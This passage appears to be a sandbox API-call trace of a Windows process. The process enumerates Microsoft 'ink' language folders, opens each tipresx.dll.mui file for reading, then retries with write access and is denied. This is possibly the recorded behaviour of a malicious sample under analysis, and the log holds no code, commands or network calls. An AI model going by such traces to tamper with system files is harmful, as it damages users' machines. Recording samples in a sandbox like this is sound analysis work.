Flags=0x0, Size=0x20) returned 0x885b8 [0082.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0082.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0082.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0082.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0082.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0082.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.319] AreFileApisANSI () returned 1 [0082.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0082.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0082.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.319] AreFileApisANSI () returned 1 [0082.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0082.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 73 [0082.319] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.320] GetFileType (hFile=0x428) returned 0x1 [0082.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0082.320] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.320] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.320] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.320] CloseHandle (hObject=0x428) returned 1 [0082.321] AreFileApisANSI () returned 1 [0082.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0082.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui") returned 73 [0082.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.321] GetLastError () returned 0x5 [0082.321] GetLastError () returned 0x5 [0082.321] SetLastError (dwErrCode=0x5) [0082.321] GetLastError () returned 0x5 [0082.321] SetLastError (dwErrCode=0x5) [0082.321] GetLastError () returned 0x5 [0082.321] SetLastError (dwErrCode=0x5) [0082.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0082.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0082.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.321] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⨀")) returned 0 [0082.321] FindClose (in: hFindFile=0x780d0 | out: hFindFile=0x780d0) returned 1 [0082.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0082.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0082.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0082.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0082.322] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.322] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.322] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.322] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0082.322] AreFileApisANSI () returned 1 [0082.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR", lpUsedDefaultChar=0x0) returned 57 [0082.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0082.322] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.322] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.323] AreFileApisANSI () returned 1 [0082.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0082.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR") returned 57 [0082.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.323] GetLastError () returned 0x5 [0082.323] GetLastError () returned 0x5 [0082.323] SetLastError (dwErrCode=0x5) [0082.323] GetLastError () returned 0x5 [0082.323] SetLastError (dwErrCode=0x5) [0082.323] GetLastError () returned 0x5 [0082.323] SetLastError (dwErrCode=0x5) [0082.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0082.323] AreFileApisANSI () returned 1 [0082.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0082.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR") returned 57 [0082.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.323] GetLastError () returned 0x5 [0082.323] GetLastError () returned 0x5 [0082.323] SetLastError (dwErrCode=0x5) [0082.323] GetLastError () returned 0x5 [0082.323] SetLastError (dwErrCode=0x5) [0082.324] GetLastError () returned 0x5 [0082.324] SetLastError (dwErrCode=0x5) [0082.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0082.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0082.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0082.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0082.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0082.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0082.324] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0082.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0082.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0082.324] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78610 [0082.324] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.324] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0082.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0082.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.325] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.325] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.325] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.325] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.325] AreFileApisANSI () returned 1 [0082.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0082.325] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.325] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0082.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.326] AreFileApisANSI () returned 1 [0082.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85d00 [0082.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 73 [0082.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.326] GetFileType (hFile=0x428) returned 0x1 [0082.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0082.326] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.326] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.326] SetFilePointerEx (in: 